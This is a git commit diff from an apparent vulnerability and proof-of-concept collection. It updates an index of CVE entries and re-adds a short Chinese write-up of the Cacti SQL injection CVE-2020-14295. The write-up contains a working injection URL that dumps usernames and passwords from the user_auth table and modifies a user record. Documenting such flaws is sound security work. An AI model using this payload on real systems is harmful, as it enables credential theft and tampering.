This commit is contained in:
Threekiii 2025-02-10 14:01:49 +08:00
parent 2b9d17c3d2
commit 0f6b3700ad
2 changed files with 30 additions and 27 deletions

View File

@ -111,6 +111,10 @@
* 禅道 V16.5 SQL 注入 CNVD-2022-42853
* 禅道 项目管理系统远程命令执行漏洞 CNVD-2023-02709
* 齐博CMS V7 job.php 任意文件读取漏洞
- MYPOC
* Cacti 任意文件创建致远程代码执行漏洞 CVE-2025-24367
* Cacti 多行 SNMP 响应验证致代码执行漏洞 CVE-2025-22604
- OA产品漏洞
* O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740
@ -586,9 +590,8 @@
* Apache Log4j2 lookup JNDI 注入漏洞 CVE-2021-44228
* Apache Mod_jk 访问控制权限绕过 CVE-2018-11759
* Apache NiFi Api 远程代码执行 RCE
* Apache RocketMQ RCE 漏洞 CVE-2023-33246
* Apache RocketMQ 远程代码执行漏洞 CVE-2023-37582
* Apache RocketMQ 远程命令执行漏洞 CVE-2023-33246
* Apache RocketMQ Broker 远程命令执行漏洞 CVE-2023-33246
* Apache RocketMQ NameServer 任意文件写入漏洞 CVE-2023-37582
* Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580
* Apache Shiro 1.2.4 反序列化漏洞 CVE-2016-4437
* Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933

View File

@ -1,24 +1,24 @@
# Cacti SQL 注入漏洞 CVE-2020-14295
## 漏洞描述
Cacti 1.2.12 中 color.php 中存在 SQL注入漏洞允许具有管理员权限的攻击者通过 filter 参数注入 SQL。因为产品接受堆积的查询所以这可能导致远程命令执行。目前该漏洞 EXP 已公开。
参考链接:
- https://github.com/Cacti/cacti/issues/3622
## 漏洞影响
```
Cacti < 1.2.13
```
## 漏洞复现
poc
```
/cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+-
```
# Cacti SQL 注入漏洞 CVE-2020-14295
## 漏洞描述
Cacti 1.2.12 中 color.php 中存在 SQL注入漏洞允许具有管理员权限的攻击者通过 filter 参数注入 SQL。因为产品接受堆积的查询所以这可能导致远程命令执行。目前该漏洞 EXP 已公开。
参考链接:
- https://github.com/Cacti/cacti/issues/3622
## 漏洞影响
```
Cacti < 1.2.13
```
## 漏洞复现
poc
```
/cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+-
```